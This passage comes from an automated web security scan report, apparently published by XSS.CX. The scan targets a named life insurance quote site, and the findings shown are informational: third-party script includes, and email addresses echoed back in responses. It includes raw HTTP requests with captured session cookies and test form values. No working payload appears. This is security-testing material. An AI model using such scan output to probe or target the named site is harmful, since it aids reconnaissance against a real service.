Content-Length: 499
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:37:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:37:46'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<span id="siteseal">
<script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=i3vAY8jiapbPmz0mPW7I1QqnSgIjFCJPL6yiqnsOOaCEJQZeLeYdfDAv7yT"></script>
...[SNIP]...
<!-- ConvergeTrack Landing Pixel Code -->
           <script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

2.3. http://www.accuquotelife.com/index11b.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /index11b.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index11b.cfm HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://accuquotelife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1313678243|session#1313678182912-659761#1313680043|PC#1313678182912-659761.19#1314887785

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:36:12 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:36:12'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: REFDIR=;expires=Thu, 08-Sep-2011 14:36:12 GMT;path=/
Vary: Accept-Encoding
Content-Length: 46187


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...
<span id="siteseal">
   <script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=i3vAY8jiapbPmz0mPW7I1QqnSgIjFCJPL6yiqnsOOaCEJQZeLeYdfDAv7yT"></script>
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- ConvergeTrack Landing Pixel Code -->
<script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...

2.4. http://www.accuquotelife.com/quote_results.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /quote_results.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /quote_results.cfm HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/index11b.cfm
Content-Length: 304
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; mbox=check#true#1313678249|session#1313678182912-659761#1313680049|PC#1313678182912-659761.19#1314887789; s_cc=true; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; CT_Type=1; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=accuquotelifeproduction%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/index11-images/display-quotes-btn.png%2526ot%253DIMAGE

Sex=2&StateID=1&TobaccoUseTypeID=10&Catagory=7&BirthMonth=1&BirthDay=01&BirthYear=1970&FaceAmountID=19&Health=477&FirstName=xss&LastName=cdd&DayTimePhone1=212&DayTimePhone2=555&DayTimePhone3=1212&Emai
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:37:29 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:37:29'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 49516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<span id="siteseal">
<script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=i3vAY8jiapbPmz0mPW7I1QqnSgIjFCJPL6yiqnsOOaCEJQZeLeYdfDAv7yT"></script>
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- ConvergeTrack Quote Request Pixel Code -->
   <script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...
<!-- ConvergeTrack Landing Pixel Code -->
<script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...
<!-- End of ConvergeTrack Pixel Code -->


<script language="JavaScript" src="https://secure.aperture.displaymarketplace.com/displayscript.js?liveconclientID=3921305974817&PageID=2"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

3. Email addresses disclosed  previous
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


3.1. http://www.accuquotelife.com/apply.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The following email address was disclosed in the response:

Request

POST /apply.cfm HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Content-Length: 499
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:37:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:37:46'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input name="Email" id="Email" type="text" size="20" maxlength="50" value="xss@accuquote.com" />
...[SNIP]...

3.2. http://www.accuquotelife.com/jscript/control.2/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /jscript/control.2/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscript/control.2/s_code.js HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/index11b.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1313678243|session#1313678182912-659761#1313680043|PC#1313678182912-659761.19#1314887785; CFID=180581568; CFTOKEN=69801649; REFDIR=

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 35220
Content-Type: application/x-javascript
Content-Location: http://www.accuquotelife.com/jscript/control.2/s_code.js
Last-Modified: Mon, 17 Jan 2011 18:00:51 GMT
Accept-Ranges: bytes
ETag: "80b67a70b6cb1:3650"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Aug 2011 14:36:12 GMT

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

3.3. http://www.accuquotelife.com/quote_results.cfm  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /quote_results.cfm

Issue detail

The following email address was disclosed in the response:

Request

POST /quote_results.cfm HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/index11b.cfm
Content-Length: 304
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; mbox=check#true#1313678249|session#1313678182912-659761#1313680049|PC#1313678182912-659761.19#1314887789; s_cc=true; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; CT_Type=1; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=accuquotelifeproduction%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/index11-images/display-quotes-btn.png%2526ot%253DIMAGE

Sex=2&StateID=1&TobaccoUseTypeID=10&Catagory=7&BirthMonth=1&BirthDay=01&BirthYear=1970&FaceAmountID=19&Health=477&FirstName=xss&LastName=cdd&DayTimePhone1=212&DayTimePhone2=555&DayTimePhone3=1212&Emai
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:37:29 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:37:29'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 49516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.com" />
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.com" />
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.com" />
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.com" />
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.com" />
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.com" />
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.com" />
...[SNIP]...

Report generated by XSS.CX at Thu Aug 18 08:43:16 GMT-06:00 2011.